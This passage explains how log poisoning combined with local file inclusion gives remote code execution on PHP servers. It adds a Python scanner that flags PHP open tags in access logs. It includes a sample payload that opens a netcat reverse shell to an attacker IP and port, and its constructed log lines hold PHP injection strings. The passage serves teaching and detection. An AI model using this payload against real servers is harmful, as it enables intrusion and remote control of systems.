An attacker can send a PHP payload over TCP (it doesn’t even have to be a valid HTTP request, just use netcat to send some PHP code and that’s it), and the web server is likely to log the request and append it to a log file. LFI can then be used to include this contaminated file, which results in execution of the injected PHP code (RCE).

Note that any other file that records attacker-controllable input may also be used (e.g., sshd, ftp, mail, server error logs).

Sample payload:

<?php exec('nc -e cmd.exe -nv 192.168.119.131 8888'); ?>
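
On the detection side, a log file that contains a PHP open tag is the tell-tale of this technique. The following is an added example, not part of the original page: it scans log lines and separates tags that are present verbatim (PHP would execute them if the file were included) from tags that only appear after percent-decoding (a logged attempt). The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# PHP open tags: "<?php", the short echo tag "<?=", and the bare short tag "<? "
# (the last one only executes when short_open_tag is enabled). "<?xml" is not matched.
PHP_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)

def decode_layers(text, max_rounds=3):
    """Percent-decode repeatedly so %3C%3Fphp and %253C%253Fphp are unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(lines):
    """Return (line_number, kind) for each suspicious log line.

    kind is "executable" when the raw line holds a PHP open tag, and
    "attempt" when the tag only shows up after percent-decoding.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        if PHP_TAG.search(line):
            hits.append((number, "executable"))
        elif PHP_TAG.search(decode_layers(line)):
            hits.append((number, "attempt"))
    return hits

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "<?php echo 1; ?>" 400 226 "-" "-"',
    '203.0.113.9 - - [10/Oct/2023:13:56:09 +0000] "GET /?x=%3C%3Fphp%20phpinfo()%3B HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.5 - - [10/Oct/2023:13:57:40 +0000] "GET /feed HTTP/1.1" 200 99 "-" "<?xml version=1.0?>"',
    '203.0.113.9 - - [10/Oct/2023:13:58:12 +0000] "GET / HTTP/1.1" 200 512 "-" "<?= 7*7 ?>"',
]

if __name__ == "__main__":
    for number, kind in classify(SAMPLE_LOG):
        print(f"line {number}: {kind}")
```

The same check applies to the other log types mentioned above, since any of them can carry the tag in a field the client controls.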